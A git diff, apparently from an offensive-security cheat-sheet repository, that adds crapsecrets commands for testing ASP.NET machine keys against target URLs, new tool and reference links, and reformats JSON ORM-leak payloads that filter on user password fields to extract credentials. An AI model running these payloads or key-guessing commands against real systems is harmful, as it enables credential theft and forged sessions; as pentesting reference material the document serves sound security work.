diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md index 818662a8..22fcddac 100644 --- a/API Key Leaks/IIS-Machine-Keys.md +++ b/API Key Leaks/IIS-Machine-Keys.md @@ -92,6 +92,16 @@ Try multiple machine keys from known products, Microsoft documentation, or other validationKey: C50B3C89CB21F4F1422FF158A5B42D0E8DB8CB5CDA1742572A487D9401E3400267682B202B746511891C1BAF47F8D25C07F6C39A104696DB51F17C529AD3CABE validationAlgo: SHA1 ``` +* [irsdl/crapsecrets](https://github.com/irsdl/crapsecrets) + + ```ps1 + python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r + python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5 + python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/ + python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/ + python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/ + ``` + * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r) ```powershell diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index c500392f..71101bd8 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -13,14 +13,15 @@ ## Tools -- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets -- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms -- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens +- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets. +- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms. +- [irsdl/crapsecrets](https://github.com/irsdl/crapsecrets) - A library for detecting known secrets across many web frameworks. +- [d0ge/sign-saboteur](https://github.com/d0ge/sign-saboteur) - SignSaboteur is a Burp Suite extension for editing, signing, verifying various signed web tokens. - [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more. -- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web -- [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid -- [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place -- [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints +- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web. +- [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. +- [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place. +- [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints. ```powershell nuclei -t token-spray/ -var token=token_list.txt diff --git a/ORM Leak/README.md b/ORM Leak/README.md index 1ebcd988..c14ace88 100644 --- a/ORM Leak/README.md +++ b/ORM Leak/README.md @@ -36,8 +36,8 @@ The ORM provides operators for matching parts of a value. These operators can ut ```json { - "username": "admin", - "password__startswith": "p" + "username": "admin", + "password__startswith": "p" } ``` @@ -63,7 +63,7 @@ Filtering through user that created an article, and having a password containing ```json { - "created_by__user__password__contains": "p" + "created_by__user__password__contains": "p" } ``` @@ -79,8 +79,8 @@ Use multiple filters in the same request: ```json { - "created_by__departments__employees__user__username__startswith": "p", - "created_by__departments__employees__user__id": 1 + "created_by__departments__employees__user__username__startswith": "p", + "created_by__departments__employees__user__id": 1 } ``` @@ -118,7 +118,7 @@ Example of an ORM leak in Node.JS with Prisma. ```js const posts = await prisma.article.findMany({ - where: req.query.filter as any // Vulnerable to ORM Leaks + where: req.query.filter as any // Vulnerable to ORM Leaks }) ``` @@ -126,11 +126,11 @@ Use the include to return all the fields of user records that have created an ar ```json { - "filter": { - "include": { - "createdBy": true - } + "filter": { + "include": { + "createdBy": true } + } } ``` @@ -138,15 +138,15 @@ Select only one field ```json { - "filter": { + "filter": { + "select": { + "createdBy": { "select": { - "createdBy": { - "select": { - "password": true - } - } + "password": true } + } } + } } ``` @@ -160,37 +160,37 @@ Select only one field ```json { - "query": { - "createdBy": { - "departments": { + "query": { + "createdBy": { + "departments": { + "some": { + "employees": { + "some": { + "departments": { "some": { - "employees": { + "employees": { + "some": { + "departments": { "some": { - "departments": { - "some": { - "employees": { - "some": { - "departments": { - "some": { - "employees": { - "some": { - "{fieldToLeak}": { - "startsWith": "{testStartsWith}" - } - } - } - } - } - } - } - } + "employees": { + "some": { + "{fieldToLeak}": { + "startsWith": "{testStartsWith}" + } } + } } + } } + } } + } } + } } + } } + } } ``` @@ -227,6 +227,7 @@ Only in Ransack < `4.0.0`. * [ORM Injection - HackTricks - July 30, 2024](https://book.hacktricks.xyz/pentesting-web/orm-injection) * [ORM Leak Exploitation Against SQLite - Louis Nyffenegger - July 30, 2024](https://pentesterlab.com/blog/orm-leak-with-sqlite3) +* [ORM Leaking More Than You Joined For - Alex Brown - December 18, 2025](https://www.elttam.com/blog/leaking-more-than-you-joined-for/) * [plORMbing your Django ORM - Alex Brown - June 24, 2024](https://www.elttam.com/blog/plormbing-your-django-orm/) * [plORMbing your Prisma ORM with Time-based Attacks - Alex Brown - July 9, 2024](https://www.elttam.com/blog/plorming-your-primsa-orm/) * [QuerySet API reference - Django - August 8, 2024](https://docs.djangoproject.com/en/5.1/ref/models/querysets/) diff --git a/SAML Injection/README.md b/SAML Injection/README.md index 8bcca624..a7e4bb91 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -17,6 +17,7 @@ ## Tools * [CompassSecurity/SAMLRaider](https://github.com/SAMLRaider/SAMLRaider) - SAML2 Burp Extension. +* [d0ge/XSW](https://github.com/d0ge/XSW) - XML Signature Wrapping Burp Suite Extensions. * [ZAP Addon/SAML Support](https://www.zaproxy.org/docs/desktop/addons/saml-support/) - Allows to detect, show, edit, and fuzz SAML requests. ## Methodology